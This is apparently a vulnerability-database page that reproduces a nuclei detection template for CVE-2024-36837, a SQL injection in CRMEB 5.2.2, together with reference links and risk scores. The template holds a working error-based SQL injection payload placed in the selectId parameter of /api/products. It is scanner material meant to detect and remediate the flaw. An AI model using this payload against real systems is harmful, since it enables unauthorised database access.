Lucene search
K

CRMEB v.5.2.2 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 117 Views

CRMEB v.5.2.2 SQL Injection allows remote attacker to obtain sensitive info via getProductList function in ProductController.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for SQL Injection in Crmeb
15 Jun 202416:44
githubexploit
GithubExploit
Exploit for SQL Injection in Crmeb
28 Sep 202410:44
githubexploit
Circl
CVE-2024-36837
15 Jun 202417:01
circl
CVE
CVE-2024-36837
5 Jun 202400:00
cve
Cvelist
CVE-2024-36837
5 Jun 202400:00
cvelist
NVD
CVE-2024-36837
5 Jun 202415:15
nvd
OSV
CVE-2024-36837
5 Jun 202415:15
osv
Positive Technologies
PT-2024-27174 · Crmeb · Crmeb
5 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-36837
23 May 202509:16
redhatcve
Vulnrichment
CVE-2024-36837
5 Jun 202400:00
vulnrichment
Rows per page
id: CVE-2024-36837

info:
  name: CRMEB v.5.2.2 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
  impact: |
    Attackers can execute SQL injection via the selectId parameter in getProductList to obtain sensitive database information.
  remediation: |
    Update CRMEB to a version later than 5.2.2 that patches the SQL injection vulnerability.
  reference:
    - https://github.com/phtcloud-dev/CVE-2024-36837
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36837
  classification:
    epss-score: 0.08306
    epss-percentile: 0.94254
    cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: crmeb
    product: crmeb
    fofa-query: title="CRMEB"
  tags: cve,cve2024,crmeb,sqli,vuln
variables:
  num: "{{rand_int(9000000, 9999999)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
          - "SQLSTATE"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206d9f551a3be1a54e03e0f84274cf92114bb5b598f84a7fc6c946364d55fbcf34022100bd9f3f51f2482bb8d360b4da7c4605fef939dbb8b0dbad20f4f3903167ae2107:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.4 - 7.5
EPSS0.08306
SSVC
117